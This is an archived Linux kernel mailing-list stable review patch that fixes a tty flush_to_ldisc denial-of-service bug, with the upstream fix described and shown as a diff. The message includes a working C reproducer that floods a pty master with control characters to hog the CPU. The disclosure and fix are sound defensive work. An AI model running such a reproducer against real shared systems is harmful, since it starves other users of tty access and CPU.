[040/127] tty: prevent DOS in the flush_to_ldisc

From: Greg KH
Date: Tue Dec 07 2010 - 21:13:49 EST

Next message: Greg KH: "[038/127] md: fix return value of rdev_size_change()"
Previous message: Greg KH: "[034/127] drivers/char/vt_ioctl.c: fix VT_OPENQRY error value"
In reply to: Greg KH: "[034/127] drivers/char/vt_ioctl.c: fix VT_OPENQRY error value"
Next in thread: Greg KH: "[038/127] md: fix return value of rdev_size_change()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

2.6.32-stable review patch. If anyone has any objections, please let us know.

------------------

From: Jiri Olsa <jolsa@xxxxxxxxxx>

commit e045fec48970df84647a47930fcf7a22ff7229c0 upstream.

There's a small window inside the flush_to_ldisc function,
where the tty is unlocked and calling ldisc's receive_buf
function. If in this window new buffer is added to the tty,
the processing might never leave the flush_to_ldisc function.

This scenario will hog the cpu, causing other tty processing
starving, and making it impossible to interface the computer
via tty.

I was able to exploit this via pty interface by sending only
control characters to the master input, causing the flush_to_ldisc
to be scheduled, but never actually generate any output.

To reproduce, please run multiple instances of following code.

- SNIP
#define _XOPEN_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char **argv)
{
int i, slave, master = getpt();
char buf[8192];

sprintf(buf, "%s", ptsname(master));
grantpt(master);
unlockpt(master);

slave = open(buf, O_RDWR);
if (slave < 0) {
perror("open slave failed");
return 1;
}

for(i = 0; i < sizeof(buf); i++)
buf[i] = rand() % 32;

while(1) {
write(master, buf, sizeof(buf));
}

return 0;
}
- SNIP

The attached patch (based on -next tree) fixes this by checking on the
tty buffer tail. Once it's reached, the current work is rescheduled
and another could run.

Signed-off-by: Jiri Olsa <jolsa@xxxxxxxxxx>
Acked-by: Alan Cox <alan@xxxxxxxxxxxxxxxxxxx>
Signed-off-by: Greg Kroah-Hartman <gregkh@xxxxxxx>

---
drivers/char/tty_buffer.c | 14 ++++++++++++--
1 file changed, 12 insertions(+), 2 deletions(-)

--- a/drivers/char/tty_buffer.c
+++ b/drivers/char/tty_buffer.c
@@ -412,7 +412,8 @@ static void flush_to_ldisc(struct work_s
spin_lock_irqsave(&tty->buf.lock, flags);

if (!test_and_set_bit(TTY_FLUSHING, &tty->flags)) {
- struct tty_buffer *head;
+ struct tty_buffer *head, *tail = tty->buf.tail;
+ int seen_tail = 0;
while ((head = tty->buf.head) != NULL) {
int count;
char *char_buf;
@@ -422,6 +423,15 @@ static void flush_to_ldisc(struct work_s
if (!count) {
if (head->next == NULL)
break;
+ /*
+ There's a possibility tty might get new buffer
+ added during the unlock window below. We could
+ end up spinning in here forever hogging the CPU
+ completely. To avoid this let's have a rest each
+ time we processed the tail buffer.
+ */
+ if (tail == head)
+ seen_tail = 1;
tty->buf.head = head->next;
tty_buffer_free(tty, head);
continue;
@@ -431,7 +441,7 @@ static void flush_to_ldisc(struct work_s
line discipline as we want to empty the queue */
if (test_bit(TTY_FLUSHPENDING, &tty->flags))
break;
- if (!tty->receive_room) {
+ if (!tty->receive_room || seen_tail) {
schedule_delayed_work(&tty->buf.work, 1);
break;
}

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/

Next message: Greg KH: "[038/127] md: fix return value of rdev_size_change()"
Previous message: Greg KH: "[034/127] drivers/char/vt_ioctl.c: fix VT_OPENQRY error value"
In reply to: Greg KH: "[034/127] drivers/char/vt_ioctl.c: fix VT_OPENQRY error value"
Next in thread: Greg KH: "[038/127] md: fix return value of rdev_size_change()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]